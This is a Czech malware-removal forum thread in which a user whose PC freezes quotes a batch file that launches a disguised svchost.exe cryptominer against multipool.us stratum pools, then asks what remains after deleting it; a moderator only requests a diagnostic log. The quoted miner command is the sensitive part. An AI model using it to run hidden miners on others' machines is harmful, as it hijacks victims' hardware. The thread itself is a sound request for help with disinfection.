Dobrý den,
celý včerejšek sem řešil po telefonu s otcem tento problém:
po 5 min nečinnosti na PC naskočí proces svchost.exe,vytíží procesor na 100% pc se sekne, vyskočí modrá smrt a pc se restartuje. Dle správce úloh jsem zjistil, že se spouští bat soubor system.bat ve kterém je toto:
wmic process where name="ProcessSwi.exe" CALL setpriority "64"
c:\Windows\globalization\Updater\svchost.exe -o stratum+tcp://pool1.eu.multipool.us:3352 -u tommyi.ppc -p x -o stratum+tcp://us-west.multipool.us:3352 -u tommyi.ppc -p x
něják nechápu co tento bat vlastně dělá? Nicméně jsme tedy smazali složku updater, následně jsme ji vyhledali v registrech, kde jsme ji také smazali, následně jsme vyhledali všechny výskyty processswi a tyto řetězce také smazali. Pc nyní nezamrzá a tyto procesy už nenaskakuje, ovšem po přihlášení do win vyskočí: průzkumník, kde je zobrazeno místní disk C a vyskočí: Nastavení programu Windows Script Host, po kliknutí na ok vše jede bezproblému, nicméně asi někde něco zůstalo co se snaží spustit onen trojan (tipuji). (v msconfig se zobrazuje položka WindowsUpdate, která odkazuje na zmíněný smazaný Updater, tuto položku jsme odškrtli, přesto po příhlášení stále vyskakuje Windows Script host nastavení) Máte s tímto někdo zkušenosti? Co ještě je potřeba udělat? Na co si dát pozor? A co vlastně tento škodlivý software prováděl? Za jakékoli rady, odpovědě děkuji.
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
processswi
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Re: processswi
Zdravim 
Dejte sem log z RSIT http://forum.viry.cz/viewtopic.php?f=13&t=130786
14.3. pro neaktivitu
http://forum.viry.cz/viewtopic.php?f=12&t=123975
Dejte sem log z RSIT http://forum.viry.cz/viewtopic.php?f=13&t=130786
14.3. pro neaktivitu
http://forum.viry.cz/viewtopic.php?f=12&t=123975Pokud máte dotaz, který není určen pro veřejnost, můžete mi napsat na mail marty84zavináčforum.viry.cz
Možnost podpořit naše fórum https://platba.viry.cz/payment/
Z časových důvodů teď budu na fóru méně často. V případě delšího čekání na odpověď kontaktujte prosím některého z kolegů (většina má mailovou adresu ve svém podpisu).
Možnost podpořit naše fórum https://platba.viry.cz/payment/
Z časových důvodů teď budu na fóru méně často. V případě delšího čekání na odpověď kontaktujte prosím některého z kolegů (většina má mailovou adresu ve svém podpisu).
Přispějete na provoz fóra?